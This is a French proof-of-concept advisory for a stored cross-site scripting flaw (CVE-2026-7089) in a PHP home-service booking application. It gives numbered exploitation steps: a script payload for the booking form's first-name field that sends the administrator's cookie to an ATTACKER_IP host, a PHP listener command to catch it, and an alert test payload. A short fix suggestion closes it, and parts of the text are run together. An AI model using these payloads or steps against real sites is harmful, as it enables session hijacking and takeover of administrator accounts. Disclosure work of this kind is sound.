
Preuve de concept pour CVE-2026-7089, une XSS stockée dans Home Service System PHP 1.0 permettant le détournement de session administrateur sans authentification via le formulaire de réservation.
| Champ | Détails |
|---|
| Fournisseur | code-projects.org |
| Produit | Home Service System In PHP |
| Version | 1.0 |
| Type de vulnérabilité | Cross-Site Scripting stocké (XSS) |
| CWE | CWE-79 |
| Authentification requise | Non |
| Auteur | Imad Alvi |
Une vulnérabilité de Cross-Site Scripting stocké (XSS) existe dans le fichier booking.php de
Home Service System In PHP 1.0. Les utilisateurs non authentifiés peuvent injecter des
charges utiles JavaScript malveillantes via les champs du formulaire de réservation. L'entrée
non assainie est stockée dans la base de données et rendue sans encodage de sortie dans le panneau
d'administration (admin.php), où elle s'exécute dans le contexte du navigateur de l'administrateur.
Cela permet à un attaquant non authentifié de voler le cookie de session de l'administrateur, d'effectuer des actions au nom de l'administrateur, ou de compromettre entièrement le compte administrateur.
booking.phpfname, lnameadmin.php → Gérer les réservationsAccédez à la page de réservation en tant qu'utilisateur non authentifié : http://TARGET/homeservices/booking.php?provider=
Dans le champ Prénom, injectez la charge utile suivante :
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
Remplissez les champs restants avec des données valides et soumettez la réservation.
Démarrez un écouteur sur votre machine d'attaquant :
php -S 0.0.0.0:PORT
Attendez que l'administrateur visite la section Gérer les réservations dans admin.php.
La charge utile s'exécute dans le navigateur de l'administrateur, exfiltration le cookie de session vers votre écouteur.

<script>alert(1)</script>

<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>
Cette vulnérabilité permet à un attaquant distant non authentifié de compromettre entièrement l'application.
Un attaquant peut :
PHPSESSID de l'administrateurhtmlspecialchars() avec ENT_QUOTES sur toutes les entrées fournies par l'utilisateur avant
le stockage ou le rendu